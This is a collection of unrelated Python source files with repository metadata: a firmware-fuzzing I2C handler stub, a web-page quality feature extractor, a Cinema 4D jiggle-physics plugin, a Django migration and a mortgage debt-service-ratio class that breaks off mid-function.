| max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content | score | int_score |
|---|---|---|---|---|---|---|
hal_fuzz/hal_fuzz/handlers/stm32f4_hal/stm32f4_i2c.py
|
diagprov/hal-fuzz
| 117
|
12783451
|
<filename>hal_fuzz/hal_fuzz/handlers/stm32f4_hal/stm32f4_i2c.py
import sys
import struct
from unicorn.arm_const import *
from ...util import *
from ..fuzz import fuzz_remaining, get_fuzz
from ...models.i2c import I2CModel
def HAL_I2C_Init(uc):
pass
def HAL_I2C_Mem_Read(uc):
# HAL_StatusTypeDef __fastcall HAL_I2C_Mem_Read(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size, uint32_t Timeout)
device_id = uc.reg_read(UC_ARM_REG_R0)
dev_addr = uc.reg_read(UC_ARM_REG_R1)
mem_addr = uc.reg_read(UC_ARM_REG_R2)
mem_addr_size = uc.reg_read(UC_ARM_REG_R3)
dst_buf = struct.unpack("<I", uc.mem_read(uc.reg_read(UC_ARM_REG_SP), 4))[0]
dst_buf_size = struct.unpack("<I", uc.mem_read(uc.reg_read(UC_ARM_REG_SP) + 0x4, 4))[0]
timeout = struct.unpack("<I", uc.mem_read(uc.reg_read(UC_ARM_REG_SP) + 0x8, 4))[0]
assert(dst_buf != 0)
assert(dst_buf_size < 1000)
assert(mem_addr < 65535)
assert(dst_buf_size >= mem_addr_size)
#stuff = I2CModel.rx(device_id, dev_addr, mem_addr_size)
stuff = get_fuzz(mem_addr_size)
uc.mem_write(dst_buf, stuff)
uc.reg_write(UC_ARM_REG_R0, 0)
print(b"<<< " + stuff)
def HAL_I2C_Mem_Write(uc):
uc.reg_write(UC_ARM_REG_R0, 0)
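# The handlers above follow the AAPCS calling convention: the first four
# arguments arrive in R0-R3 and any further arguments are read from the stack.
# A minimal generic argument reader is sketched below for illustration only;
# the name read_call_arg is made up and is not part of the original module.
def read_call_arg(uc, index):
    """Return the index-th 32-bit argument of the intercepted call (AAPCS)."""
    if index < 4:
        reg = [UC_ARM_REG_R0, UC_ARM_REG_R1, UC_ARM_REG_R2, UC_ARM_REG_R3][index]
        return uc.reg_read(reg)
    sp = uc.reg_read(UC_ARM_REG_SP)
    return struct.unpack("<I", uc.mem_read(sp + 4 * (index - 4), 4))[0]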
| 2.046875
| 2
|
models/QSDM.py
|
rmit-ir/AnswerPassageQuality
| 8
|
12783452
|
"""
Quality-biased ranking (Bendersky et al., 2011)
"""
import argparse
import bs4
import collections
import json
import math
# import re
import string
from smart_open import smart_open
# Module side
#
class Pipeline():
"""Feature extraction pipeline"""
def __init__(self):
self.jobs = []
def add(self, features, adaptor=None):
if not isinstance(features, (tuple, list)):
features = [features]
self.jobs.append({'adaptor': adaptor, 'extractors': features})
def extract(self, item):
vector = []
for job in self.jobs:
input_ = item if job['adaptor'] is None else job['adaptor'](item)
for extractor in job['extractors']:
vector.append(extractor(input_))
return vector
PUNCTUATION_REMOVER = string.maketrans(string.punctuation, ' ' * len(string.punctuation))
def to_terms(text):
return text.encode('utf8', errors='replace').translate(PUNCTUATION_REMOVER).split()
def UrlDepth(url):
"""The depth of the URL path"""
pos = url.find('://')
if pos >= 0:
return url[pos+3:].count('/')
else:
return url.count('/')
def NumVisTerms(doc):
"""Number of visible terms on the page"""
_, terms = doc
return len(terms)
def NumTitleTerms(doc):
"""Number of terms in the page <title> field"""
soup, _ = doc
if soup.title is None:
return 0
else:
return len(to_terms(soup.title.get_text()))
def AvgTermLen(doc):
"""Average length of visible term on the page"""
_, terms = doc
return float(sum(len(t) for t in terms)) / len(terms) if terms else 0
def FracAnchorText(doc):
"""Fraction of anchor text on the page"""
soup, terms = doc
terms_in_anchor_texts = sum(len(to_terms(tag.get_text())) for tag in soup.find_all('a'))
return float(terms_in_anchor_texts) / len(terms) if terms else 0
def FracVisText(doc):
"""Fraction of visible text on the page"""
soup, _ = doc
try:
pagesize = len(soup.decode_contents())
except Exception:
pagesize = 0
return float(len(soup.get_text())) / pagesize if pagesize > 0 else 0
def Entropy(doc):
"""Entropy of the page content"""
_, terms = doc
N = len(terms)
tf = collections.Counter(terms)
return math.log(N) - float(sum(n * math.log(n) for n in tf.values())) / N if N > 0 else 0
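# Note: the expression above is the Shannon entropy (natural log) of the term
# distribution, rewritten so no explicit probabilities are needed:
#   H = -sum_i (n_i / N) * log(n_i / N) = log(N) - (1 / N) * sum_i n_i * log(n_i)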
class FracStops():
"""Stopword/non-stopword ratio"""
def __init__(self, stoplist):
self.stoplist = stoplist
def __call__(self, doc):
_, terms = doc
return float(sum(term in self.stoplist for term in terms)) / len(terms) if terms else 0
class StopCover():
"""Fraction of terms in the stopword list that appear on the page"""
def __init__(self, stoplist):
self.stoplist = stoplist
def __call__(self, doc):
_, terms = doc
if self.stoplist:
return float(sum(sw in terms for sw in self.stoplist)) / len(self.stoplist)
else:
return 0
def FracTableText(doc):
"""Fraction of table text on the page"""
soup, terms = doc
terms_in_tables = 0
for tag in soup.find_all('table'):
if any(p.name == 'table' for p in tag.parents):
continue
terms_in_tables += len(to_terms(tag.get_text()))
frac = float(terms_in_tables) / len(terms) if terms else 0
assert frac <= 1
return frac
# Data side
BLOCK_TAGS = ('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p', 'div', 'ul', 'ol', 'tr',
'td', 'th', 'table', 'dl', 'dd', 'li', 'blockquote', 'pre',
'address', 'title', 'head')
def SOUP_TERMS(doc):
chunk = doc['text']
soup = bs4.BeautifulSoup(chunk, 'lxml')
for elem in soup(['br']):
elem.insert_after('\n')
for elem in soup(BLOCK_TAGS):
elem.insert_after('\n')
terms = to_terms(soup.get_text().lower())
return soup, terms
def URL(doc):
return doc['url']
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('corpus_json')
parser.add_argument('stoplist')
args = parser.parse_args()
stoplist = set(l.strip() for l in smart_open(args.stoplist))
pipeline = Pipeline()
pipeline.add(UrlDepth, adaptor=URL)
pipeline.add([NumVisTerms, NumTitleTerms, AvgTermLen, FracAnchorText, FracVisText,
Entropy, FracStops(stoplist), StopCover(stoplist), FracTableText], adaptor=SOUP_TERMS)
ranked_lists = json.load(smart_open(args.corpus_json))
for rl in ranked_lists:
qid = rl['topic']['qid']
for doc in rl['docs']:
docno = doc['docno']
rel = max(doc['rel'], 0)
score = doc['score']
vector = ' '.join(['{}:{}'.format(i, val) for i, val in enumerate(pipeline.extract(doc), 2)])
print('{rel} qid:{qid} 1:{score} {vector} # {docno}'.format(**locals()))
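# Each printed line follows the SVM-light/LETOR convention, e.g. (made-up values):
#   1 qid:201 1:-5.3174 2:3 3:542 4:4.87 ... # some-docno
# where feature 1 is the original retrieval score and features 2+ come from the pipeline.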
| 2.71875
| 3
|
tjiggle.py
|
beesperester/cinema4d-jiggle
| 1
|
12783453
|
import os
import c4d
import math
# Be sure to use a unique ID obtained from www.plugincafe.com
PLUGIN_ID = 123456790
#----begin_resource_section----
from bootstrap4c4d import Description, Assignment, Group, Container
crumb_percent_slider = [
Assignment("STEP", 1.0),
Assignment("UNIT", "PERCENT"),
Assignment("CUSTOMGUI", "REALSLIDER"),
Assignment("MINSLIDER", 0.0),
Assignment("MAXSLIDER", 100.0)
]
crumb_percent_slider_limit_min = [
Assignment("MIN", 0.0)
]
crumb_percent_slider_limit_max = [
Assignment("MAX", 100.0)
]
crumb_flag_group_open = Assignment("DEFAULT", 1)
settings_effect_strength = Description({
"id": "SETTINGS_EFFECT_STRENGTH",
"key": "REAL",
"value": [
*crumb_percent_slider,
*crumb_percent_slider_limit_min,
*crumb_percent_slider_limit_max
],
"locales": {
"strings_us": "Strength"
}
})
settings_base_origin_object = Description({
"id": "SETTINGS_BASE_ORIGIN_OBJECT",
"key": "LINK",
"value": [
Assignment("ANIM", "OFF"),
Description({
"key": "ACCEPT",
"value": [
Assignment("Obase", None)
]
})
],
"locales": {
"strings_us": "Origin"
}
})
settings_base_start_time = Description({
"id": "SETTINGS_BASE_START_TIME",
"key": "REAL",
"value": [
Assignment("UNIT", "TIME")
],
"locales": {
"strings_us": "Start Time"
}
})
settings_base_target_offset = Description({
"id": "SETTINGS_BASE_TARGET_OFFSET",
"key": "VECTOR",
"value": [
Assignment("UNIT", "METER")
],
"locales": {
"strings_us": "Target Offset"
}
})
settings_base_draw_debug_lines = Description({
"id": "SETTINGS_BASE_DRAW_DEBUG_LINES",
"key": "BOOL",
"value": [
Assignment("ANIM", "OFF")
],
"locales": {
"strings_us": "Draw Debug Lines"
}
})
vector_xplus = Assignment(None, None, {
"id": "VECTOR_XPLUS",
"locales": {
"strings_us": "X+"
}
})
vector_xminus = Assignment(None, None, {
"id": "VECTOR_XMINUS",
"locales": {
"strings_us": "X-"
}
})
vector_yplus = Assignment(None, None, {
"id": "VECTOR_YPLUS",
"locales": {
"strings_us": "Y+"
}
})
vector_yminus = Assignment(None, None, {
"id": "VECTOR_YMINUS",
"locales": {
"strings_us": "Y-"
}
})
vector_zplus = Assignment(None, None, {
"id": "VECTOR_ZPLUS",
"locales": {
"strings_us": "Z+"
}
})
vector_zminus = Assignment(None, None, {
"id": "VECTOR_ZMINUS",
"locales": {
"strings_us": "Z-"
}
})
settings_base_up_vector = Description({
"id": "SETTINGS_BASE_UP_VECTOR",
"key": "LONG",
"value": [
Assignment("ANIM", "OFF"),
Assignment("CYCLE", [
vector_xplus,
vector_xminus,
vector_yplus,
vector_yminus,
vector_zplus,
vector_zminus
])
],
"locales": {
"strings_us": "Up Vector"
}
})
settings_base_aim_vector = Description({
"id": "SETTINGS_BASE_AIM_VECTOR",
"key": "LONG",
"value": [
Assignment("ANIM", "OFF"),
Assignment("CYCLE", [
vector_xplus,
vector_xminus,
vector_yplus,
vector_yminus,
vector_zplus,
vector_zminus
])
],
"locales": {
"strings_us": "Aim Vector"
}
})
group_effect = Group("GROUP_EFFECT", {
"value": [
crumb_flag_group_open,
settings_effect_strength
],
"locales": {
"strings_us": "Effect"
}
})
group_base = Group("GROUP_BASE", {
"value": [
crumb_flag_group_open,
settings_base_origin_object,
settings_base_target_offset,
settings_base_draw_debug_lines,
settings_base_start_time,
settings_base_up_vector,
settings_base_aim_vector
],
"locales": {
"strings_us": "Base"
},
})
# squash and stretch
settings_squash_stretch_enable = Description({
"id": "SETTINGS_SQUASH_STRETCH_ENABLE",
"key": "BOOL",
"value": [
Assignment("ANIM", "OFF")
],
"locales": {
"strings_us": "Enable"
}
})
settings_squash_stretch_stretch_strength = Description({
"id": "SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH",
"key": "REAL",
"value": [
*crumb_percent_slider,
*crumb_percent_slider_limit_min
],
"locales": {
"strings_us": "Stretch Strength"
}
})
settings_squash_stretch_squash_strength = Description({
"id": "SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH",
"key": "REAL",
"value": [
*crumb_percent_slider,
*crumb_percent_slider_limit_min
],
"locales": {
"strings_us": "Squash Strength"
}
})
group_squash_stretch = Group("GROUP_SQUASH_STRETCH", {
"value": [
crumb_flag_group_open,
settings_squash_stretch_enable,
settings_squash_stretch_stretch_strength,
settings_squash_stretch_squash_strength
],
"locales": {
"strings_us": "Squash and Stretch"
}
})
# physics descriptions
settings_physics_stiffness = Description({
"id": "SETTINGS_PHYSICS_STIFFNESS",
"key": "REAL",
"value": crumb_percent_slider,
"locales": {
"strings_us": "Stiffness"
}
})
settings_physics_mass = Description({
"id": "SETTINGS_PHYSICS_MASS",
"key": "REAL",
"value": crumb_percent_slider,
"locales": {
"strings_us": "Mass"
}
})
settings_physics_damping = Description({
"id": "SETTINGS_PHYSICS_DAMPING",
"key": "REAL",
"value": crumb_percent_slider,
"locales": {
"strings_us": "Damping"
}
})
settings_physics_gravity = Description({
"id": "SETTINGS_PHYSICS_GRAVITY",
"key": "VECTOR",
"value": [
Assignment("UNIT", "METER")
],
"locales": {
"strings_us": "Gravity"
}
})
group_physics = Group("GROUP_PHYSICS", {
"value": [
crumb_flag_group_open,
settings_physics_stiffness,
settings_physics_mass,
settings_physics_damping,
settings_physics_gravity
],
"locales": {
"strings_us": "Base"
},
})
root = Container("Tjiggle", {
"value": [
Assignment("NAME", "Tjiggle"),
Assignment("INCLUDE", "Tbase"),
Assignment("INCLUDE", "Texpression"),
Group("GROUP_SETTINGS", {
"value": [
crumb_flag_group_open,
group_effect,
group_base,
group_squash_stretch,
group_physics
],
"locales": {
"strings_us": "Settings"
}
})
],
"locales": {
"strings_us": "Jiggle"
}
})
#----end_resource_section----
#----begin_id_section----
VECTOR_XPLUS = vector_xplus.GetId()
VECTOR_XMINUS = vector_xminus.GetId()
VECTOR_YPLUS = vector_yplus.GetId()
VECTOR_YMINUS = vector_yminus.GetId()
VECTOR_ZPLUS = vector_zplus.GetId()
VECTOR_ZMINUS = vector_zminus.GetId()
# effect ids
SETTINGS_EFFECT_STRENGTH = settings_effect_strength.GetId()
# base ids
SETTINGS_BASE_ORIGIN_OBJECT = settings_base_origin_object.GetId()
SETTINGS_BASE_START_TIME = settings_base_start_time.GetId()
SETTINGS_BASE_TARGET_OFFSET = settings_base_target_offset.GetId()
SETTINGS_BASE_UP_VECTOR = settings_base_up_vector.GetId()
SETTINGS_BASE_AIM_VECTOR = settings_base_aim_vector.GetId()
SETTINGS_BASE_DRAW_DEBUG_LINES = settings_base_draw_debug_lines.GetId()
# squash stretch ids
SETTINGS_SQUASH_STRETCH_ENABLE = settings_squash_stretch_enable.GetId()
SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH = settings_squash_stretch_stretch_strength.GetId()
SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH = settings_squash_stretch_squash_strength.GetId()
# physics ids
SETTINGS_PHYSICS_STIFFNESS = settings_physics_stiffness.GetId()
SETTINGS_PHYSICS_MASS = settings_physics_mass.GetId()
SETTINGS_PHYSICS_DAMPING = settings_physics_damping.GetId()
SETTINGS_PHYSICS_GRAVITY = settings_physics_gravity.GetId()
#----end_id_section----
class DataContainer(object):
def __init__(self, data):
self.data = data
@property
def strength(self):
return self.data[SETTINGS_EFFECT_STRENGTH]
@strength.setter
def strength(self, value):
self.data[SETTINGS_EFFECT_STRENGTH] = value
@property
def originObject(self):
return self.data[SETTINGS_BASE_ORIGIN_OBJECT]
@property
def targetOffset(self):
return self.data[SETTINGS_BASE_TARGET_OFFSET]
@targetOffset.setter
def targetOffset(self, value):
self.data[SETTINGS_BASE_TARGET_OFFSET] = value
@property
def drawDebugLines(self):
return self.data[SETTINGS_BASE_DRAW_DEBUG_LINES]
# time
@property
def startTime(self):
return self.data[SETTINGS_BASE_START_TIME]
@startTime.setter
def startTime(self, value):
self.data[SETTINGS_BASE_START_TIME] = value
# up vector
@property
def upVector(self):
return self.data[SETTINGS_BASE_UP_VECTOR]
@upVector.setter
def upVector(self, value):
self.data[SETTINGS_BASE_UP_VECTOR] = value
# aim vector
@property
def aimVector(self):
return self.data[SETTINGS_BASE_AIM_VECTOR]
@aimVector.setter
def aimVector(self, value):
self.data[SETTINGS_BASE_AIM_VECTOR] = value
# squash stretch
@property
def squashStretchEnable(self):
return self.data[SETTINGS_SQUASH_STRETCH_ENABLE]
@property
def squashStretchStretchStrength(self):
return self.data[SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH]
@squashStretchStretchStrength.setter
def squashStretchStretchStrength(self, value):
self.data[SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH] = value
@property
def squashStretchSquashStrength(self):
return self.data[SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH]
@squashStretchSquashStrength.setter
def squashStretchSquashStrength(self, value):
self.data[SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH] = value
# physics
@property
def stiffness(self):
return self.data[SETTINGS_PHYSICS_STIFFNESS]
@stiffness.setter
def stiffness(self, value):
self.data[SETTINGS_PHYSICS_STIFFNESS] = value
@property
def mass(self):
return self.data[SETTINGS_PHYSICS_MASS]
@mass.setter
def mass(self, value):
self.data[SETTINGS_PHYSICS_MASS] = value
@property
def damping(self):
return self.data[SETTINGS_PHYSICS_DAMPING]
@damping.setter
def damping(self, value):
self.data[SETTINGS_PHYSICS_DAMPING] = value
@property
def gravity(self):
return self.data[SETTINGS_PHYSICS_GRAVITY]
@gravity.setter
def gravity(self, value):
self.data[SETTINGS_PHYSICS_GRAVITY] = value
class Jiggle(c4d.plugins.TagData):
"""Jiggle"""
def Init(self, node):
"""
Called when Cinema 4D initializes the TagData (used to define default values).
:param node: The instance of the TagData.
:type node: c4d.GeListNode
:return: True on success, otherwise False.
"""
# data = node.GetDataInstance()
data = DataContainer(node.GetDataInstance())
data.strength = 1.0
data.resultRotation = c4d.Vector(0, 0, 0)
# time related
self.previousFrame = 0
data.targetOffset = c4d.Vector(0, 0, 100)
data.startTime = 0.0
# up vector
data.upVector = VECTOR_YPLUS
# aim vector
data.aimVector = VECTOR_ZPLUS
# squash stretch
data.squashStretchStretchStrength = 0.0
data.squashStretchSquashStrength = 0.0
# physics related
data.stiffness = 0.1
data.mass = 0.9
data.damping = 0.75
data.gravity = c4d.Vector(0, -981.0, 0)
self.Reset(node)
c4d.EventAdd()
return True
@classmethod
def GetFrame(cls, time, fps):
return time.GetFrame(fps)
@classmethod
def CalculateTargetPosition(cls, origin, offset):
if origin:
return offset * origin.GetMg()
return offset
def GetHandleCount(self, op):
"""
:param op: The host object of the tag.
:type op: c4d.BaseObject
:return:
"""
return 1
def GetHandle(self, op, i, info):
"""
:param op: The host object of the tag.
:type op: c4d.BaseObject
:param i: Index of handle
:type i: int
:param info: Info of handle
:type info: c4d.HandleInfo
:return:
"""
data = DataContainer(op.GetDataInstance())
info.position = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
info.type = c4d.HANDLECONSTRAINTTYPE_FREE
def SetHandle(self, op, i, p, info):
"""
:param op: The host object of the tag.
:type op: c4d.BaseObject
:param i: Index of handle
:type i: int
:param p: Handle Position
:type p: c4d.Vector
:param info: Info of handle
:type info: c4d.HandleInfo
:return:
"""
data = DataContainer(op.GetDataInstance())
data.targetOffset = p * ~data.originObject.GetMg()
def Execute(self, tag, doc, op, bt, priority, flags):
"""
Called by Cinema 4D at each Scene Execution, this is the place where calculation should take place.
:param tag: The instance of the TagData.
:type tag: c4d.BaseTag
:param doc: The host document of the tag's object.
:type doc: c4d.documents.BaseDocument
:param op: The host object of the tag.
:type op: c4d.BaseObject
:param bt: The thread that executes this TagData.
:type bt: c4d.threading.BaseThread
:param priority: Information about the execution priority of this TagData.
:type priority: EXECUTIONPRIORITY
:param flags: Information about when this TagData is executed.
:type flags: EXECUTIONFLAGS
:return:
"""
data = DataContainer(tag.GetDataInstance())
fps = doc.GetFps()
currentFrame = float(Jiggle.GetFrame(doc.GetTime(), fps))
originMatrix = data.originObject.GetMg()
originPosition = originMatrix.off
projectedPosition = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
if currentFrame > data.startTime:
# only update if the current frame is exactly one frame after the previous one
if currentFrame == self.previousFrame + 1.0:
self.Update(tag, doc, op)
else:
self.Reset(tag)
# blend position by strength
targetPosition = c4d.utils.MixVec(projectedPosition, self.position, data.strength)
# calculate matrix
# calculate aim vector
aim = c4d.Vector(targetPosition - originPosition).GetNormalized()
# change up vector position
if data.upVector == VECTOR_XPLUS:
up = originMatrix.MulV(c4d.Vector(1.0, 0, 0))
elif data.upVector == VECTOR_XMINUS:
up = originMatrix.MulV(c4d.Vector(-1.0, 0, 0))
elif data.upVector == VECTOR_YPLUS:
up = originMatrix.MulV(c4d.Vector(0, 1.0, 0))
elif data.upVector == VECTOR_YMINUS:
up = originMatrix.MulV(c4d.Vector(0, -1.0, 0))
elif data.upVector == VECTOR_ZPLUS:
up = originMatrix.MulV(c4d.Vector(0, 0, 1.0))
elif data.upVector == VECTOR_ZMINUS:
up = originMatrix.MulV(c4d.Vector(0, 0, -1.0))
side = up.Cross(aim)
# calculate squash and stretch
if data.squashStretchEnable:
distance = c4d.Vector(targetPosition - originPosition).GetLength()
maxDistance = data.targetOffset.GetLength()
relativeDistance = distance - maxDistance
try:
squashStretchBias = abs(relativeDistance) / maxDistance
except ZeroDivisionError:
squashStretchBias = 0.0
if relativeDistance > 0.0:
squashStretchBias = squashStretchBias * data.squashStretchStretchStrength
# stretch
aim = aim * (1.0 + squashStretchBias)
up = up * (1.0 - squashStretchBias)
side = side * (1.0 - squashStretchBias)
else:
squashStretchBias = squashStretchBias * data.squashStretchSquashStrength
# squash
aim = aim * (1.0 - squashStretchBias)
up = up * (1.0 + squashStretchBias)
side = side * (1.0 + squashStretchBias)
# change input order based on aim axis
if data.aimVector == VECTOR_XPLUS:
jiggleMatrix = c4d.Matrix(
originPosition,
aim,
up,
side
)
elif data.aimVector == VECTOR_XMINUS:
jiggleMatrix = c4d.Matrix(
originPosition,
-aim,
up,
side
)
elif data.aimVector == VECTOR_YPLUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
aim,
up
)
elif data.aimVector == VECTOR_YMINUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
-aim,
up
)
elif data.aimVector == VECTOR_ZPLUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
up,
aim
)
elif data.aimVector == VECTOR_ZMINUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
up,
-aim
)
op.SetMg(jiggleMatrix)
# finish execute
self.previousFrame = currentFrame
return c4d.EXECUTIONRESULT_OK
def Draw(self, tag, op, bd, bh):
data = DataContainer(tag.GetDataInstance())
drawpass = bd.GetDrawPass()
if not data.drawDebugLines:
return True
# draw target line
targetPosition = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_XAXIS))
bd.DrawLine(
data.originObject.GetMg().off,
targetPosition,
0
)
# draw connection
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_YAXIS))
bd.DrawLine(
targetPosition,
self.position,
0
)
# draw current target
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_ZAXIS))
bd.DrawLine(data.originObject.GetMg().off, self.position, 0)
# bd.SetMatrix_Screen()
# circlePosition = bd.WS(targetPosition)
# bd.DrawCircle2D(circlePosition.x, circlePosition.y, 5.0)
if drawpass == c4d.DRAWPASS_HANDLES:
bd.SetMatrix_Screen()
handleScreenSpace = bd.WS(Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset))
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_OBJECTHIGHLIGHT))
bd.DrawCircle2D(handleScreenSpace.x, handleScreenSpace.y, 8)
c4d.plugins.TagData.Draw(self, tag, op, bd, bh)
return True
def Reset(self, tag):
"""
Reset the simulated spring state (force, acceleration, velocity, position).
:param tag: The instance of the TagData.
:type tag: c4d.BaseTag
:return:
"""
# print("Reset")
data = DataContainer(tag.GetDataInstance())
self.force = c4d.Vector(0, 0, 0)
self.acceleration = c4d.Vector(0, 0, 0)
self.velocity = c4d.Vector(0, 0, 0)
self.position = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
def Update(self, tag, doc, op):
"""
Update loop.
:param tag: The instance of the TagData.
:type tag: c4d.BaseTag
:param doc: The host document of the tag's object.
:type doc: c4d.documents.BaseDocument
:param op: The host object of the tag.
:type op: c4d.BaseObject
:return:
"""
# print("Update")
data = DataContainer(tag.GetDataInstance())
targetPosition = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
direction = targetPosition - self.position
#direction = c4d.Vector(0, 0, 0)
# calculate spring
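# (a simple damped spring: the force is stiffness times the displacement plus a
# scaled per-frame gravity term; acceleration = force / mass; the velocity is
# attenuated by (1 - damping); the position is advanced by one explicit step per frame)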
self.force = (direction * data.stiffness) + (data.gravity / 10.0 / float(doc.GetFps()))
self.acceleration = self.force / data.mass
self.velocity = self.velocity + (self.acceleration * (1.0 - data.damping))
self.position = self.position + self.velocity + self.force
if __name__ == "__main__":
# Retrieves the icon path
directory, _ = os.path.split(__file__)
fn = os.path.join(directory, "res", "tjiggle.png")
# Creates a BaseBitmap
bmp = c4d.bitmaps.BaseBitmap()
if bmp is None:
raise MemoryError("Failed to create a BaseBitmap.")
# Init the BaseBitmap with the icon
if bmp.InitWith(fn)[0] != c4d.IMAGERESULT_OK:
raise MemoryError("Failed to initialize the BaseBitmap.")
c4d.plugins.RegisterTagPlugin(id=PLUGIN_ID,
str="Jiggle",
info=c4d.TAG_EXPRESSION | c4d.TAG_VISIBLE | c4d.TAG_IMPLEMENTS_DRAW_FUNCTION,
g=Jiggle,
description="Tjiggle",
icon=bmp
)
| 1.953125
| 2
|
accounts/migrations/0007_auto_20200708_2235.py
|
Ascensiony/Software-Dev-Project
| 2
|
12783454
|
<filename>accounts/migrations/0007_auto_20200708_2235.py
# Generated by Django 2.2.10 on 2020-07-08 17:05
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_user_summary'),
]
operations = [
migrations.AddField(
model_name='user',
name='passout_year',
field=models.CharField(blank=True, max_length=4),
),
migrations.AddField(
model_name='user',
name='phone_number',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
]
| 1.851563
| 2
|
Mortgage_Package/financial/ex_debtServiceRatio.py
|
ubco-mds-2020-labs/data-533-lab-4-lukavuko
| 0
|
12783455
|
<reponame>ubco-mds-2020-labs/data-533-lab-4-lukavuko
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %%
class debtServiceRatio:
"""
A class used to calculate debt service ratios and determine maximum annual and monthly mortgage payments
...
Attributes
----------
income : numeric
home buyer's annual income
property_tax : numeric
home buyer's annual property tax
heat_cost : numeric
home buyer's annual heat cost
car_payment : numeric
home buyer's annual car payment
credit_card_payment : numeric
home buyer's annual credit card payment
downpayment : int
home buyer's proposed downpayment
home_price : int
home buyer's desired home price
months : int
months in one year
gds_ratio : float
current ratio for Gross Debt Service
gds_max_annual_spend : numeric
calculates home buyer's maximum annual spending available
gds_max_mortgage_annual : numeric
calculates home buyer's maximum annual mortgage payments
gds_max_mortgage_monthly : numeric
calculates home buyer's maximum monthly mortgage payments
tds_ratio : numeric
current ratio for Total Debt Service
tds_max_annual_spend : numeric
calculates home buyer's maximum annual spending available
tds_max_mortgage_annual : numeric
calculates home buyer's maximum annual mortgage payments
tds_max_mortgage_monthly : numeric
calculates home buyer's maximum monthly mortgage payments
Methods
-------
gds()
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Gross Debt Service Ratio of 32%
tds()
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Total Debt Service Ratio of 40%
"""
downpayment = 0
def __init__(self, income, property_tax, heat_cost, car_payment, credit_card_payment, downpayment, home_price):
"""
Attributes
----------
income : numeric
property_tax : numeric
heat_cost : numeric
car_payment : numeric
credit_card_payment : numeric
downpayment : int
home_price : int
"""
self.income = income
self.property_tax = property_tax
self.heat_cost = heat_cost
self.car_payment = car_payment
self.credit_card_payment = credit_card_payment
self.downpayment = downpayment
self.home_price = home_price
def gds(self, prin = False): #max affordability based on GDS score
"""
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Gross Debt Service Ratio of 32%
...
Attributes
----------
gds_ratio : float
months : int
gds_max_annual_spend = float
gds_max_mortgage_annual = float
gds_max_mortgage_monthly = float
Returns
-------
gds_max_mortgage_annual : float
self.downpayment : float
"""
gds_ratio = 0.32 #change to 0.35
months = 12
gds_max_annual_spend = self.income * gds_ratio
gds_max_mortgage_annual = gds_max_annual_spend - self.property_tax - self.heat_cost
gds_max_mortgage_monthly = gds_max_mortgage_annual / months
if prin == True:
print("Max Annual Spending: ${}".format(gds_max_annual_spend))
print("Max Annual Mortgage Payment: ${}".format(gds_max_mortgage_annual))
print("Max Monthly Mortgage Payment: ${}".format(gds_max_mortgage_monthly))
#return (max_annual_spend, max_mortgage_annual, max_mortgage_monthly)
if self.downpayment > gds_max_mortgage_annual:
downpayment = gds_max_mortgage_annual
if prin == True:
print("Your downpayment: ${}".format(gds_max_mortgage_annual))
return gds_max_mortgage_annual
else:
downpayment = self.downpayment
if prin == True:
print("Your downpayment: ${}".format(self.downpayment))
return self.downpayment #######
def tds(self, prin = False): #max affordability based on TDS score
"""
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Total Debt Service Ratio of 40%
...
Attributes
----------
tds_ratio : float
months : 12
tds_max_annual_spend = float
tds_max_mortgage_annual = float
tds_max_mortgage_monthly = float
Returns
-------
tds_max_mortgage_annual : float
self.downpayment : float
"""
tds_ratio = 0.40 # change to 0.42
months = 12
tds_max_annual_spend = self.income * tds_ratio
tds_max_mortgage_annual = tds_max_annual_spend - self.property_tax - self.heat_cost - self.car_payment - self.credit_card_payment
tds_max_mortgage_monthly = tds_max_mortgage_annual / months
if prin == True:
print("Max Annual Spending: ${}".format(tds_max_annual_spend))
print("Max Annual Mortgage Payment: ${}".format(tds_max_mortgage_annual))
print("Max Monthly Mortgage Payment: ${}".format(tds_max_mortgage_monthly))
if self.downpayment > tds_max_mortgage_annual: #
downpayment = tds_max_mortgage_annual
if prin == True:
print("Your downpayment: ${}".format(tds_max_mortgage_annual))
return tds_max_mortgage_annual #######
else:
downpayment = self.downpayment
if prin == True:
print("Your downpayment: ${}".format(self.downpayment))
return self.downpayment #######
# %%
def mortgage_max(buyer_dsr):
"""
Calculates maximum loan available to offer based on buyer's proposed downpayment and downpayment percent
...
Returns
-------
loan : float
Returns maximum available loan to be offered
"""
downpayment_percent = 0
min_downpayment = 0
try:
if buyer_dsr.home_price <= 500000:
